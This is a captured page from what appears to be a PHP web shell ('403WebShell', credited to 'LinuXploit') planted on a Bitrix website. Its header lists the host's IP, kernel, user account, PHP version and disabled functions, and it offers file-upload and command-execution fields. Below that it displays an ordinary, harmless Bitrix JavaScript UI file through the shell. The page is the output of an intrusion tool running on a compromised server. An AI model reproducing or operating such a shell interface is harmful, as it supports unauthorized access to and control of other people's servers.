%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.217.37.129
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/landing/ui/field/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/landing/ui/field//block_source_field.js
;(function() {
	"use strict";

	BX.namespace("BX.Landing.UI.Field");

	/**
	 * Implements interface for works with multi select field
	 * @extends {BX.Landing.UI.Field.BaseField}
	 * @param options
	 * @constructor
	 */
	BX.Landing.UI.Field.BlockSource = function(options)
	{
		BX.Landing.UI.Field.BaseField.apply(this, arguments);
		BX.Landing.Utils.addClass(this.layout, "landing-ui-field-block-source");

		this.onSourceChangeHandler = options.onSourceChange;
		this.value = options.value;

		this.sourceField = this.createLinkField();

		this.layout.innerHTML = "";
		BX.Landing.Utils.append(this.sourceField.layout, this.layout);
	};


	BX.Landing.UI.Field.BlockSource.prototype = {
		constructor: BX.Landing.UI.Field.BlockSource,
		__proto__: BX.Landing.UI.Field.BaseField.prototype,

		getSources: function()
		{
			return BX.Landing.Main.getInstance().options.sources;
		},

		createLinkField: function()
		{
			return new BX.Landing.UI.Field.LinkURL({
				selector: "source",
				title: BX.Landing.Loc.getMessage("LANDING_BLOCK__SOURCE_TITLE"),
				textOnly: true,
				disableCustomURL: true,
				disablePages: true,
				disallowType: true,
				allowedTypes: [
					BX.Landing.UI.Field.LinkURL.TYPE_BLOCK
				],
				customPlaceholder: BX.Landing.Loc.getMessage('LANDING_BLOCK__BLOCK_SOURCE_PLACEHOLDER'),
				options: {
					siteId: BX.Landing.Main.getInstance().options.site_id,
					landingId: BX.Landing.Main.getInstance().id,
					filter: {
						"=TYPE": BX.Landing.Main.getInstance().options.params.type
					}
				},
				content: this.value,
				onValueChange: function(value) {
					var currentSource = null;

					if (
						BX.type.isPlainObject(value)
						&& BX.type.isPlainObject(value.source)
					)
					{
						currentSource = Object.keys(value.source)[0];
					}

					var source = this.getSources().find(function(item) {
						return item.id === currentSource;
					});

					setTimeout(function() {
						this.onSourceChangeHandler(source);
					}.bind(this), 0);
				}.bind(this)
			});
		},

		getValue: function()
		{
			return this.sourceField.getValue();
		}
	};
})();

Youez - 2016 - github.com/yon3zu
LinuXploit